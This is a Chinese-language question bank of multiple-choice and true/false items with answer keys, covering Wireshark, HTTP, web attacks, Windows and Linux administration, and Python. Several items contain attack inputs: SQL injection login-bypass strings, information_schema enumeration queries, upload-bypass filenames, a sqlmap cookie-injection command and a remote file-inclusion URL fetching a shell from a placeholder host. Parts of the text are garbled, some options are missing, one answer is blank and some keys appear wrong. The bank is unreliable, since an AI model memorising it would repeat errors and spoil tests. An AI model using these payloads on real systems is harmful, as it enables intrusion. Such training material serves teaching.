A、 tcp.analysis.lost_segment
B、 tcp.analysis.window_update
C、 tcp.analysis.ack_rtt
D、 tcp.analysis.duplicate_ack
标准答案: A
24、我们可以使用 wireshark 中的 IO Graph来对网络整体流量信息进行显示分析,是否正确?
A、 对
B、 错
标准答案: A
25、以下哪个文件夹存放的是 wireshark 负责解析网络协议文件?
A、 Core
B、 Capture
C、 Epan
D、 Wiretap
标准答案: C
26、FTP协议使用443端口而不是标准21端口时,我们可以强制将解析错误的包按照指定协议解析,是否正确?
A、 对
B、 错
标准答案: A
27、设置后,达到无法通过客户端 JavaScript 直接访问 Cookie 的选项是
A、 Domain
B、 Expires
C、 Secure
D、 HttpOnly
标准答案: D
28、下列选项中,状态码解释错误的选项是
A、 200: 表示已成功提交请求,且相应主体中包含请求结果
B、 400: 表示客户端提交了一个无效的 HTTP 请求
C、 414: 服务器无法处理客户端发送的不带Content-Length的请求信息
D、 500:服务器内部错误,无法完成请求
标准答案: C
29、下列选项中,表示将浏览器暂时重定向到另外一个在 Location 消息头中指定的 URL 的状态码是
A、 100
B、 201
C、 302
D、 403
标准答案: C
30、HTTPS 本质与 HTTP 一样,都属于应用层协议,但 HTTPS 通过安全传输机制——安全套阶层(Secure Socket Layer,SSL)来传送数据。这种说法正确吗()
A、 对
B、 错
标准答案: A
31、下列 URL 编码解释错误的是:
A、 %3d 代表 =
B、 %25 代表 %
C、 %0a 代表新行
D、 %00 代表空格
标准答案: D
32、下面 HTML 编码解释错误的是:
A、 " 代表 "
B、 &apos 代表 ’
C、 < 代表 <
D、 > 代表 <
标准答案: D
33、如果没有启用 WebDAV 扩展,OPTIONS 命令是无法查看 IIS 支持的方法集合的。即便是复选上了“写入”,仍然无法写入 txt 文件。该说法正确吗()
A、 对
B、 错
标准答案: A
34、动态语言,服务器和客户端代码不一致;静态语言,服务端和客户端代码一致。该说法是否正确()
A、 对
B、 错
标准答案: A
35、下列一键 PHP 环境的工具中,不可以安装在 Linux 中的是()
A、 PHPStudy
B、 PHPNow
C、 WampServer
D、 XAMPP
标准答案: C
36、下列 ASP 接受参数的方式错误的是()
A、 request
B、 request.get
C、 request.cookie
D、 request.form
标准答案: B
37、下列链接中不存在注入点的是()
A、 http://www.****.com/***.asp?id=XX
B、 http://www.****.com/***.php?name=XX&page=99
C、 http://www.****.com/index/new/php-8.html
D、 http://www.****.com/news.html
标准答案: D
38、下列 mysql 的 PHP 函数说法错误的是()
A、 mysql_connect(‘host’, ‘username’, ‘pass’); 连接 mysql 链接
B、 mysql_db_select($database, $conn); 选择数据库
C、 mysql_query($sql, $conn); 执行 SQL 语句
D、 mysql_fetch_array($result); 将查询结果的一条返回到一个数组中
标准答案: B
39、下面说法是否正确,注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明()
A、 对
B、 错
标准答案: A
40、程序使用 SQLServer 数据库,当程序登录页面存在注入时,下列选项中,属于万能密码的是()
A、 用户名输入: '(或") AND 1 = 1-- ;密码随便输入
B、 用户名输入: '(或") && 1 = 1-- ;密码随便输入
C、 用户名输入: '(或") OR 1 = 1-- ;密码随便输入
D、 用户名输入: '(或") || 1 = 1-- ;密码随便输入
标准答案: C
41、已知 SQL 语句为: s q l = ′ S E L E C T ∗ F R O M ‘ m e m b e r ‘ W H E R E ‘ u s e r n a m e ‘ = " ′ . sql = 'SELECT * FROM `member` WHERE `username` = "'. sql=′SELECT∗FROM‘member‘WHERE‘username‘="′._GET[‘name’].’" AND password
= “’.$_GET[‘pwd’].’”’; ,当访问 http://xxx.com?name=admin" OR “1”=“2&pwd=” OR “1”="1 时,可以完成用户验证吗()
A、 对
B、 错
标准答案: A
42、已知字符型注入语句 s q l = ′ S E L E C T ∗ F R O M ‘ m e m e b e r ‘ W H E R E ‘ u s e r n a m e ‘ = " ′ . sql = 'SELECT * FROM `memeber` WHERE `username` = "'. sql=′SELECT∗FROM‘memeber‘WHERE‘username‘="′.user.’" AND pass
= “’.$pass.’”’,下列能成功执行注入的是()
A、 $user = ‘admin OR 1 = 1–’; $pass = ‘something’;
B、 $user = ‘admin OR 1 = 2’; $pass = ‘" OR 1 = 1’;
C、 $user = ‘admin" OR 1 = 1’; $pass = ‘" OR 1 = 2’;
D、 $user = ‘admin" OR “1” = "2’; $pass = ‘" OR “1” = "1’;
标准答案: D
43、MySQL 5 中新增了一个 information_schema 库,该库中存储了数据库信息内容,可直接爆库、爆表、爆字段;而 MySQL 4 只能采用类似 Access 的方法进行查询猜解,该说法是否正确()
A、 对
B、 错
标准答案: A
44、用 ORDER BY 来判断字段数量时,ORDER BY 后面跟 5 时,正常返回,后面跟 6 时,报 Unknown column ‘6’ in ‘order clause’ 错误,当前目标表有几个字段()
A、 4
B、 5
C、 6
D、 7
标准答案: B
45、使用 ORDER BY 手工注入进行字段数判断时,ORDER BY 6 未报错,ORDER BY 7 报 UNKNOWN COLUMN ‘7’ IN ‘ORDER CLAUSE’,该表有几个字段()
A、 5
B、 6
C、 7
D、 8
标准答案: B
46、已知 MySQL 版本大于 5,手工注入时,访问 http://127.0.0.1/index.php?id=3’%20SELECT%20GROUP_CAT(SCHEMA_NAME)%20FROM%20INFROMATION_SCHEMA.SCHEMATA,可以获取到的是()
A、 所有数据库
B、 所有表
C、 所有字段
D、 所有字段类型
标准答案: A
47、在 MySQL INFORMATION_SCHEMA 数据库中,保存数据库信息的表是()
A、 TABLES
B、 SCHEMATA
C、 COLUMNS
D、 DATABASES
标准答案: B
48、SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() LIMIT 0,1 ,该语句查询的是当前数据库的第一条表信息,该说法正确吗()
A、 对
B、 错
标准答案: A
49、下列 MySQL 的 SQL 语句中,能同时查询用户、数据库版本、数据库并以 , 分割的是()
A、 SELECT user(),version(),database();
B、 SELECT user(),’,’,version(),’,’,database();
C、 SELECT user().version().database();
D、 SELECT group_concat(user(),version(),database());
标准答案: D
50、下列 MySQL 的 SQL 语句中,能够查询所有数据库的是()
A、 SELECT TABLE_NAME FROM INFROMATION_SCHEMA.TABLES;
B、 SELECT SCHEMA_NAME FROM INFROMATION_SCHEMA.SCHEMATA;
C、 SELECT DATABASE_NAME FROM INFROMATION_SCHEMA.DATABASES;
D、 SELECT COLUMN_NAME FROM INFROMATION_SCHEMA.COLUMNS;
标准答案: B
1、下列有关 ASP、PHP 接受参数的方式错误的是()
A、 ASP:request.get(接收 get 传参)
B、 PHP:$_GET(接收 get 传参)
C、 ASP:request(全部接收)
D、 PHP:$_REQUEST(全部接收)
标准答案: A
2、当使用 Burp 进行 Cookie 手工注入的时候,下列可以判断是否报错的是()
A、 X-Powered-By
B、 Content-Length
C、 Content-Type
D、 Cache-control
标准答案: B
3、下列命令能实现 SQLMap Cookie 注入的是()
A、 sqlmap.py -u “http://www.xxx.com/product.php?id=58”
B、 sqlmap.py -u “http://www.xxx.com/product.php” --data “id=58”
C、 sqlmap.py -u “http://www.xxx.com/product.php” --data “id=58” --level 1
D、 sqlmap.py -u “http://www.xxx.com/product.php” --cookie “id=58” --level 2
标准答案: D
4、XSS属于服务端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一
A、 对
B、 错
标准答案: B
5、存储型XSS,持久化,代码是存储在服务器中的;反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码
A、 对
B、 错
标准答案: A
6、下面属于隐蔽型的 XSS 的选项是:
A、 反射型 XSS
B、 存储型 XSS
C、 不持久型 XSS
标准答案: B
7、当网站对
A、 alert(1)
B、
C、
D、 alert(1)
标准答案: C
8、XSS能够对网站进行攻击且造成网站权限丢失()
A、 对
B、 错
标准答案: B
9、下面上传突破说法错误的是()
A、 客户端 JavaScript 可以通过 Burp 抓包修改进行上传
B、 服务端 MIME 类型检测可以通过修改 Content-Type 进行上传
C、 服务端文件扩展名检测可以通过服务端解析漏洞,上传其他扩展名文件进行突破
D、 使用 a.asp;.jpg 对 IIS 8.0 服务器进行上传突破
标准答案: D
10、在非 PHP 的 WEB 安全中出现概率很大而且威力也很大的攻击主要有两种,第一种是 SQL 注入,第二种是上传攻击。该说法正确吗()
A、 对
B、 错
标准答案: A
11、使用 Burp 抓包实验 0x00 截断时,下面做法可以完成绕过的是()
A、 直接在抓的包中修改 filename 部分,将可以上传的扩展名前面加空格拼接到文件后面
B、 直接在抓的包中修改 Content-Type
C、 在 Burp 抓的包中选择 Hex(十六进制),修改符合条件的后缀名前面点的十六进制为 00
标准答案: C
12、服务器检测绕过(目录路径检测),因为对目录路径的检测不够严谨而导致可以使用 0x00 截断攻击,该说法是否正确()
A、 对
B、 错
标准答案: A
13、在 fckeditor 2.4.3 或之前版本的黑名单中 ConfigDeniedExtensions.Add “File”, “html|htm|php|php2|php3|php4”,下列方法中可以绕过上传 php 文件的是()
A、 上传文件 shell.PhP
B、 上传文件 shell.php4
C、 上传文件 shell.php3
D、 上传文件 shell.php .jpg
标准答案: A
14、已知服务器为 Apache,且后缀名 123abc 未在黑名单中、后缀名 asp 在黑名单中,上传 shell.asp.123abc 文件能否成功执行()
A、 对
B、 错
标准答案: A
15、利用 IIS 解析漏洞,含有一句话木马的文件 test.php;.jpg,可以被菜刀连接成功吗()
A、 对
B、 错
标准答案: A
16、下列即属于黑名单检测绕过又属于白名单检测绕过的是()
A、 文件名大小写绕过
B、 名单列表绕过
C、 特殊文件名绕过(windows)
D、 0x00 截断绕过
标准答案: D
17、一个文件名为 x1.x2.x3 的文件,Apache 会从 x3 的位置往 x1 的位置开始尝试解析,一直往前解析,直到遇到一个能解析的扩展名为止,该说法正确吗()
A、 对
B、 错
标准答案: A
18、当 PHP 配置设置为可以远程包含时,下列是远程包含的是()
A、 http://www.mubiao.com/file.php?read=../../../image/shell.php
B、 http://www.mubiao.com/file.php?read=/image/shell.php
C、 http://www.mubiao.com/file.php?read=C:/htdocs/image/shell.php
D、 http://www.mubiao.com/file.php?read=http://www.xxx.com/shell.php
标准答案: D
19、当 PHP 配置文件中, allow_url_include 设置为 off 时,可以包含远程文件,该说法正确吗()
A、 对
B、 错
标准答案: B
20、对第三方组件慎重使用说法错误是():
A、 尽量从官方渠道下载第三方组件
B、 对第三方组件的安全测试
C、 对第三方组件不需要安全加固、补丁更新
D、 对第三方组件的定期升级计划
标准答案: C
21、为了减少编程错误引起的安全缺陷,Java开发者不应该遵循建议的安全开发规范。()
A、 对
B、 错
标准答案: B
22、通过恶意手段耗尽被攻击对象的资源,让目标计算机或网络服务无法提供正常的服务、资源访问,使目标服务系统停止响应崩溃。
A、 对
B、 错
标准答案: A
23、下面这段XML代码,当程序加载的时候,会尝试写一段代码到/dev/tty文件里。
A、 对
B、 错
标准答案: B
24、JAVA出现数组越界,不会抛出异常,会继续执行。
A、 对
B、 错
标准答案: B
25、安全部署前、中、后的那一句是正确的():
A、 部署后进行漏洞扫描,渗透测试,日常运维,包括WEB漏洞扫描
B、 发现缺陷部署前,不需要对软件安全检测
C、 基础软件的安全性不影响将来承载的应用软件的安全性
D、 部署中应关闭上线过程临时开放的端口服务
标准答案: A
26、常见的安全需求主要包括:身份认证,会话管理,访问控制,权限管理,数据保护,安全审计,异常处理。()
A、 对
B、 错
标准答案: B
27、访问控制有两个方面:限制用户对资源的访问,资源请求数量限制。对IP进行控制,采用统一的访问控制机制,在服务器端实现访问控制。()
A、 对
B、 错
标准答案: A
28、对于源代码审计安全缺陷,不是外部输入风险的是():
A、 终端输入数据
B、 第三方来源的数据
C、 拒绝服务的防御
D、 数据库中的数据
标准答案: C
29、源代码审计配置文件说法错误的是():
A、 已知恶意的数据拉入黑名单,白名单只允许少数机器访问
B、 账号长度避免使用弱口令,限制输入次数错误的登录
C、 记录日志安全不需要开启服务
D、 执行化配置文件存储了开发的信息,弱口令,连接地址,通讯方式等
标准答案: C
30、下面代码是动态构造的,不是典型的动态sql注入。():
A、 对
B、 错
标准答案: B
31、下面代码中,使用指针p之前没有检查p是否为空,不造成安全隐患。()
A、 对
B、 错
标准答案: B
32、下面代码中,判断指针p是否为NULL,判断前调用log函数没使用p,NULL指针引用没问题。()
A、 对
B、 错
标准答案: B
33、关于Windows2003版本说法正确的是():
A、 Windows2003标准版有Web版本的所有功能
B、 Windows2003标准版增加了Metadirectory Services Support、集群、热添加(Hot-Add)内存、终端服务会话目录等功能,还增加一个支持64位计算版本
C、 Windows2003 Web版有全部版本的所有功能
D、 Windows2003企业版支持高达8-32路处理器,64G内存,8节点的集群,增加了一个数据中心程序包
标准答案: A
34、下面添加或删除Windwos程序正确说法是():
A、 添加/删除Windows组件可以安装第三方网络服务
B、 Windows网络服务每一个对应的软件在系统里面不是一个组件
C、 添加/删除Windows组件可以添加终端服务组件
D、 更改或删除程序里可以删除安装程序和Windows组件
标准答案: C
35、连接到Internet和连接到工作区,连接错误是():
A、 连接到Internet,用拨号调制解调器连接
B、 连接到我的工作场所创建VPN网络,虚拟专用网络连接
C、 连接到Internet,用要求用户名和密码的宽带连接来连接
D、 连接到我的工作场所创建VPN网络,直接拨号连接
标准答案: D
36、本地连接Internet(TCP/IP)属性设置错误是():
A、 DHCP自动对局域网所有用户计算机分配IP地址
B、 设置静态IP,DNS不填写,可以连接到网络
C、 默认网关参数不设置,不能连接网络
D、 子网掩码默认自动获取
标准答案: B
37、本地系统账户和域用户账户的区别说法错误的是():
A、 本地系统账户是本机建立的用户账户,域账户是域服务器上由管理员分配给你的账户
B、 域账户是域控制器上创建的账户,所有域账户都不属于domain users组
C、 域管理员帐号属于domain admins组,具有管理域控制器的权限
D、 本地账户可以登录到域上,并获得访问该网络的权限
标准答案: B
38、使用Administrator对计算机或配置进行管理正确的是():
A、 本地Administrator账户可以更名,也可以删除
B、 Administrator账户不能完全控制整台计算机
C、 在执行管理任务时使用普通用户,执行非管理用户是使用Administrator管理员
D、 Administrator账户可以创建修改用户账户和组,管理安全策略,创建打印机,分配允许用户访问资源的权限等
标准答案: D
39、对于内置组账户和创建新组账户说法错误是():
A、 创建新组账户是在本地安全设置里用户权限分配设置
B、 内置组账户具有完全控制、从网络访问计算机、调整进程的内存配额、允许本地登录、指派等权限
C、 系统内置默认的组账户都不能删除
D、 创建新组用户有内置用户组的所有权限
标准答案: D
40、下面对NTFS文件系统功能说法错误的是():
A、 可以设置权限
B、 磁盘映射访问
C、 文件加密
D、 磁盘配额
标准答案: B
41、文件夹和文件权限定义说法错误的是():
A、 文件夹权限:完全控制,可以执行所有操作
B、 文件权限:完全控制,特别的权限
C、 文件权限:修改,读取,运行,写入
D、 文件夹权限:与文件和文件夹的数据有关,与安全选项卡读取、更改无关
标准答案: D
42、NTFS文件系统相对于FAT和FAT32文件系统来说,对文件资源保护,文件资源的安全性存在风险。()
A、 对
B、 错
标准答案: B
43、复制操作:不同NTFS分区和同NTFS分区都继承目的地权限。()
A、 对
B、 错
标准答案: A
44、移动操作:同NTFS分区移动不保留原有权限,不同NTFS分区移动则继承目的地权限。()
A、 对
B、 错
标准答案: B
45、DHCP服务器中的设置数据全部存放在名为dhcp.mdb数据库文件中,该文件位于Windows\ SysWOW64\dhcp文件夹内。()
A、 对
B、 错
标准答案: B
46、DHCP服务器和DHCP客户端处于不同的广播域,如何解决?()
A、 解除三层设备
B、 转发广播报文
C、 关闭广播中继
D、 开启DHCP中继功能
标准答案: D
47、在大型网络中,每台终端的地址都是有不同的使用来分配,出现地址相同,不会发生冲突。()
A、 对
B、 错
标准答案: B
48、如果要解析一个网站IP,在本地连接“设置DNS服务器地址”域到查询请求的IP,置顶向下解析正确的是():
A、 本地域名服务器,查缓存、本地数据库,二级域名服务器,顶级域名服务器,根域名服务器,返回结果
B、 根域名服务器,二级域名服务器,顶级域名服务器,返回结果
C、 查缓存、本地数据库,根域名服务器,顶级域名服务器,二级域名服务器,返回结果
D、 本地域名服务器,根域名服务器,顶级域名服务器,二级域名服务器,返回结果
标准答案: D
49、对DNS的数据文件说法错误的是():
A、 区域的数据都是存储在DNS服务器内的区域文件内
B、 区域文件和缓存文件存储在“%systemroot%\SysWOW64\dns”
C、 缓存文件存储着根域内的DNS服务器名称与IP地址的对照数据
D、 区域文件名为zonename.dns,缓存文件名为cacheddns
标准答案: B
50、在ftp传输过程中,为了定位ftp传输开始的数据包位置,筛选器的命令应该是
A、 ftp.request.command==
B、 ftp.request.command==
C、 ftp.request.command==
D、 ftp.request.command ==
标准答案: C
1、wireshark哪个功能可以提取传输文件
A、 flow graph
B、 throughput graph
C、 follow tcp stream
D、 udp multicast streams
标准答案: C
2、wireshark通信流量图可以提供ftp通信的快速视图
A、 对
B、 错
标准答案: A
3、在wireshark所抓数据包分析里,客户端出现响应延迟的标志是
A、 初始握手SYN,ACK包time值较高
B、 初始握手后的GET包time值较高
C、 初始握手后的ACK包time值较高
标准答案: B
4、在wireshark所抓数据包分析里,SYN响应包是ACK
A、 对
B、 错
标准答案: B
5、在wireshark所抓数据包分析里,拆除SSL连接的数据包是哪个
A、 FIN,ACK
B、 SYN,ACK
C、 ACK
D、 SYN
标准答案: A
6、处于同一网络内可以拦截https明文传输内容
A、 对
B、 错
标准答案: B
7、在wireshark中若捕获了30个DNS数据包,则说明捕获的数据包中存在有多少个DNS相关事务
A、 30个
B、 15个
C、 10个
标准答案: B
8、通过wireshark哪个功能可以查看http请求的所有域名的统计信息
A、 statistics的conversations功能
B、 statistics的collectd功能
C、 statistics的http功能
标准答案: C
9、可以通过statistics的conversations查看会话及连接的统计详情,这种说法对吗
A、 对
B、 错
标准答案: A
10、目标服务器端口关闭时,扫描器会
A、 没有收到数据包
B、 收到RST数据包
C、 收到SYN/ACK数据包
D、 收到FIN/ACK数据包
标准答案: B
11、筛选端口号为443的所有数据包时过滤器的语句是tcp.dstport==443
A、 对
B、 错
标准答案: B
12、扫描windows系统时收到的TTL是
A、 64
B、 128
C、 255
标准答案: B
13、nmap可以进行主动扫描
A、 对
B、 错
标准答案: A
14、ARP攻击成功后的标志是
A、 HTTP包中远程地址不变,MAC地址变为攻击者地址
B、 HTTP包中MAC地址不变,远程地址变为攻击者地址
C、 HTTP包中MAC地址和远程地址均变成攻击者的地址
标准答案: A
15、攻击者的ARP包中目标MAC地址指向被攻击的MAC地址
A、 对
B、 错
标准答案: A
16、通过wireshark哪个功能可以查找快速特定字符串
A、 Filter
B、 Find Packet
C、 Follow TCP Stream
标准答案: B
17、JPG文件头的十六进制码是
A、 47 49
B、 FF D8
C、 89 50
标准答案: B
18、在wireshark中使用IO Graphs可以查看会话流,这种说法对吗
A、 对
B、 错
标准答案: A
19、手机中广泛使用的协议是
A、 DNS
B、 TCP
C、 UDP
标准答案: C
20、在wireshark捕获的数据包中,通过哪些字段可以获得浏览器及系统版本相关信息
A、 Host
B、 Accept-Language
C、 Cookie
D、 User-Agent
标准答案: D
21、wireshark过滤器中输入dns可以显示所有dns相关的数据包
A、 对
B、 错
标准答案: A
22、apache核心配置文件是
A、 /etc/http/conf/http.conf
B、 /etc/httpd/conf/http.conf
C、 /etc/http/conf/httpd.conf
D、 /etc/httpd/conf/httpd.conf
标准答案: D
23、apache配置文件中的代表的是
A、 系统根目录
B、 用户根目录
C、 网站根目录
D、 配置目录
标准答案: C
24、网站默认页可以在apache文件中的哪个标签中设置
A、 AccessFileName
B、 Files
C、 Directory
D、 DirectoryIndex
标准答案: D
25、若需要设置访问认证,则应该在哪个文件中配置
A、 index.html
B、 .htaccess
C、 http.conf
标准答案: B
26、检查apache是否安装的命令是rpm -q httpd
A、 对
B、 错
标准答案: A
27、在ftp配置中,若要允许匿名用户登陆则应如何配置
A、 guest_enable=YES
B、 local_enable=YES
C、 anonymous_enable=YES
标准答案: C
28、检查apache是否安装的命令是rpm -q vsftp
A、 对
B、 错
标准答案: B
29、Sendmail服务器的配置文件是
A、 /etc/mail/sendmail.mc
B、 /etc/mail/sendmail.conf
C、 /etc/sendmail/sendmail.mc
D、 /etc/sendmail/sendmail.conf
标准答案: A
30、Sendmail的access文件中代表返回错误信息的是
A、 OK
B、 REJECT
C、 DISCARD
D、 RELAY
标准答案: B
31、Sendmail的别名功能不能进行转发
A、 对
B、 错
标准答案: B
32、jQuery在哪个版本以下存在公开的XSS漏洞?( )
A、 1.5
B、 1.6
C、 1.7
D、 1.8
标准答案: C
33、目录浏览漏洞是由于哪项配置不当引起的?( )
A、 Web服务权限
B、 数据库配置
C、 服务器端口
D、 输入输出过滤
标准答案: A
34、下列哪项不属于移动端应用安全防护措施?()
A、 加壳
B、 代码混淆
C、 完整性验证
D、 WAF
标准答案: D
35、下列哪项不属于移动应用安全检测分析中对数据安全性的检测?()
A、 数据输入
B、 输入存储
C、 数据复制数据输出
D、 MAC地址
标准答案: C
36、使用Apktool对apk文件进行反编译,得到程序文件是什么语言?( )
A、 Java
B、 Smali
C、 C++
D、 ARM
标准答案: B
37、使用apktool进行回编译应该使用哪个参数?( )
A、 s
B、 b
C、 rf
D、 d
标准答案: B
38、要抓取移动设备HTTPS的数据包,需要在该设备上进行那种设置?
A、 安装ca证书
B、 安装Burp Suite
C、 Root
D、 修改Host
标准答案: A
39、渗透测试的流程中不包含以下哪些流程
A、 信息搜集
B、 渗透测试
C、 痕迹清除
D、 后门植入
标准答案: D
40、应用层收集的信息不包括以下哪种
A、 Web服务器指纹
B、 网站后台
C、 DNS域传送漏洞
D、 服务器提供商
标准答案: D
41、认证与会话部分经常出现的漏洞有哪些
A、 目录遍历
B、 文件包含
C、 XSS
D、 Session劫持
标准答案: D
42、以下哪款工具可以判断目标网站是否使用了WAF?( )
A、 Nmap
B、 nslookup
C、 wafw00f
D、 Ping
标准答案: C
43、Nslookup的作用是什么?()
A、 查询目标网站的DNS解析
B、 查看目标站点的操作系统版本
C、 对目标服务器的开放端口进行扫描
D、 爆破邮箱密码
标准答案: B
44、解决企业中安全事件流程繁琐踢皮球的有效方式是什么? ( )
A、 建立安全评审组
B、 成立SRC
C、 设置安全响应机制
D、 购买安全服务
标准答案: A
45、风险评估的目的是更好地了解风险、把握风险,并对风险作出防范措施
A、 对
B、 错
标准答案: A
46、利用IBM Security Appscan Standard工具扫描网站时,如果目标网站过大,可以采用哪种方式提高效率?( )
A、 正则表达式
B、 环境定义
C、 自动表单填充
D、 多步骤操作
标准答案: A
47、风险评估过程中,通过相关工具发现网站漏洞后,接下来应该就进行的操作是什么?( )
A、 上传后门
B、 总结并上报
C、 置之不理
D、 帮忙修复
标准答案: B
48、纳入企业安全体系中的工作流程有哪些?( )
A、 代码上线
B、 安全意识培养
C、 绩效管理
D、 产品设计
标准答案:
49、防御文件包含漏洞的方法不包括()
A、 避免外界指定文件名
B、 拒绝上传文件
C、 文件名中不可包含目录名
D、 限定文件名中仅包含字母与数字
标准答案: B
50、Linux中,mod_security安装成功后,安装在下面哪个文件夹中?()
A、 /var/mod_security
B、 /apache
C、 /etc/init.d
D、 /home/user
标准答案: B
1、Linux环境搭建中,如果出现IPV4地址与DVWA不吻合,需要在编辑哪个文件()?
A、 /etc/hosts
B、 /etc/file
C、 /var/www/dvwa
D、 /etc/address
标准答案: A
2、如果部署于计算机的有WAF经常出现误报的现象,有哪些有效的解决方法?( )
A、 注销规则
B、 修改阈值
C、 检测服务器
D、 对规则进行过滤
标准答案: B
3、Snort中匹配到sqlmap关键字,但实际并没有遭受攻击,原因是有可能是什么?( )
A、 系统自我修复
B、 攻击者无法注入
C、 规则不严谨
D、 攻击者未攻击成功
标准答案: C
4、snort规则代码中每修改一次,版本号要增加1,表示版本号的是()
A、 msg
B、 content
C、 sid
D、 rev
标准答案: D
5、对攻击者入侵调查取证原则不包括()
A、 找到事件本质
B、 多尝试
C、 逆向思考
D、 搜集攻击者信息
标准答案: D
6、当发现攻击者进行SQL注入攻击时被拦截并获取其IP地址时,应当如何处理?()
A、 追踪攻击者的痕迹
B、 备份并查看日志,保存证据
C、 不当回事
D、 直接告诫攻击者
标准答案: B
7、Python通过哪个模块对正则表达式提供支持?( )
A、 re
B、 time
C、 sys
D、 thread
标准答案: A
8、Python正则表达式模块,使用“\D”来匹配什么内容?( )
A、 字母
B、 非字母
C、 数字
D、 非数字
标准答案: D
9、Python正则表达式模块,使用“{m}”的匹配什么内容?( )
A、 匹配前一个字符m次
B、 匹配后一个字符m次
C、 匹配长度为m的单词
D、 匹配长度为m的数字
标准答案: A
10、使用贪婪模式“ab*”来匹配“abbbcba”得到的结果是?( )
A、 ab
B、 abbb
C、 abbbcb
D、 abbbc
标准答案: B
11、若想匹配出“
A、
B、
C、 div class=“coursename”> title="(.*?)" onclick …… ”
D、
标准答案: C
12、Python中若是用ulrlib库请求指定URL页面的内容,应该使用哪个函数?( )
A、 urlopen()
B、 add_header
C、 fileopen()
D、 sleep()
标准答案: A
13、Python中安装第三方库应该使用什么命令?( )
A、 pip install
B、 apt-get install
C、 brew cask install
D、 yum
标准答案: A
14、Python的request库中,是用什么方式查看返回的HTTP状态码?( )
A、 requests.statuscode
B、 requests.responsecode
C、 requests.header
D、 requests.cookie
标准答案: A
15、假如在编写爬虫时,目标网站进行了防爬处理,应该在代码中添加什么内容?( )
A、 将抓取的内容解密
B、 设置请求的header
C、 设置请求的cookie
D、 更换请求类型
标准答案: B
16、以下关于进程和线程的描述错误的是?
A、 每个进程都有自己的内存地址空间和数据栈
B、 一个进程至少有一个线程
C、 线程能够独立执行
D、 同一个进程的多线程,可以共享内容空间
标准答案: C
17、Python中可以使用threading模块进行多线程程序的编写,一个新的线程的开启应当使用哪个函数?
A、 t.join()
B、 t.start_new_thread()
C、 t.append()
D、 t.sleep()
标准答案: B
18、在Python多线程程序中引入Queue模块可以解决什么问题?()
A、 生产参数和计算结果时间不确定的问题
B、 Thread模块不能分布式编程的问题
C、 Thread模块性能不足的问题
D、 多线程操作变量混乱的问题
标准答案: C
19、在不考虑硬件环境的前提下,Python中Queue的长度可以是无限的。
A、 对
B、 错
标准答案: A
20、Queue模块有多重队列产生模式,其默认的队列模式是什么?( )
A、 FIFO
B、 LIFO
C、 FEFO
D、 LEFO
标准答案: A
21、C/S架构中,C和S分别代表什么?( )
A、 Client和Sever
B、 Computer和Signal
C、 Computer和Socket
D、 Client与Socket
标准答案: A
22、网络化的应用程序在开始仁和通讯之前都必须创建套接字。
A、 对
B、 错
标准答案: A
23、Python中的Socket模块里,用于发送UDP数据的是什么函数?( )
A、 s.send()
B、 s.recv()
C、 s.sendall()
D、 s.sendto()
标准答案: D
24、在Python没有DB API之前,通过什么方式对数据库进行操作?( )
A、 数据库GUI接口
B、 数据库接口程序
C、 SQLmap
D、 PHPMyAdmin
标准答案: B
25、如何建立Python客户端与MySQL数据库的网络连接?( )
A、 MySQLdb.Connect
B、 Cursor.execute()
C、 Connection.cursor
D、 Connection.close
标准答案: A
26、Python数据库编程中如何执行一条数据库查询指令?( )
A、 execute(op[,args])
B、 fetchone()
C、 fetchall()
D、 rowcount
标准答案: A
27、以下哪个选项的内容可以创建一个FSO对象(IIS内置组件),用于操作磁盘文件?()
A、 set fso=server.createobject(“scripting.filesystemobject”)
B、 set fso=server.createobject(“scripting.filesystem”)
C、 set fso=request.createobject(“scripting.filesystemobject”)
D、 set fso=request.createobject(“scripting.fileobject”)
标准答案: A
28、Windows下执行cmd命令"copy 1.txt \.\c:\aux.txt",生成的aux.txt要如何删除呢?()
A、 del c:\aux.txt
B、 del aux.txt
C、 del \.\c:\aux.txt
D、 del .\c:\aux.txt
标准答案: C
29、通过IIS内置组件FSO对象的哪个方法可以创建一个文件操作对象?()
A、 createtextfile
B、 createbufferfile
C、 gettextfile
D、 getbufferfile
标准答案: A
30、IIS无法禁止用户下载以mdb为尾缀的文件。
A、 对
B、 错
标准答案: B
31、PHP中哪个函数可以创建一个新文件?()
A、 fopen
B、 fwrite
C、 fclose
D、 fgetfile
标准答案: A
32、PHP函数isset()的功能是什么?()
A、 检测变量是否为空
B、 检测变量是否为数字
C、 检测变量是否设置值
D、 检测变量是否为字符串
标准答案: C
33、以下哪个PHP的伪协议可以接收POST数据?()
A、 php://input
B、 php://fd
C、 php://filter
D、 php://temp
标准答案: A
34、以下哪种文件名称可以利用Apache的解析漏洞来运行脚本?()
A、 test.jpg.html
B、 test.php.xxx
C、 test.jpg.xxx
D、 test.html.xxx
标准答案: B
35、存在解析漏洞的Apache会将test.html.x1.x2.x3文件识别为html文件。
A、 对
B、 错
标准答案: A
36、网络安全防护体系在战略方面应该以什么为核心?()
A、 技术
B、 人
C、 设备
D、 网络
标准答案: B
37、网络安全防护体系在战术方面应该以什么为手段?()
A、 技术
B、 攻防
C、 情报
D、 设备
标准答案: C
38、网络安全威胁情报的八个核心要素不包括以下哪个选项?()
A、 被攻击系统
B、 设备
C、 动机
D、 威胁源
标准答案: B
39、缩短攻击者的自由攻击时间成为了安全事件应急响应的关键。
A、 对
B、 错
标准答案: A
40、以下哪个选项的标准不属于网络安全威胁情报?()
A、 TAXII
B、 Cybox
C、 TCIA
D、 STIX
标准答案: C
41、威胁情报进行信息共享过程中要注意信息的隐私问题。
A、 对
B、 错
标准答案: A
42、Wireshark命令行下查看文件概述信息的命令是()
A、 test2pcap
B、 capinfos
C、 rawshark
D、 tshark
标准答案: B
43、使用tshark从数据包筛选出指定IP地址的数据包文件命令是()
A、 tshark -r x.pcapng -Z “ip.addr==192.168.0.1” -w x2.pcapng
B、 tshark -r x.pcapng -V “ip.addr==192.168.0.1” -w x2.pcapng
C、 tshark -r x.pcapng -Y “ip.addr==192.168.0.1” -w x2.pcapng
标准答案: C
44、使用tshark查看数据包的TCP会话信息的命令()
A、 tshark -n -q -r x.pcap -z “conv.tcp”
B、 tshark -n -q -r x.pcap -z “smb.srt”
C、 tshark -n -q -r x.pcap -z “smb.srt”
标准答案: A
45、Wireshark环境下,使用Editcap x.pcapng output.pcapng -i 4命令的作用是()
A、 文件包切分成4个文件
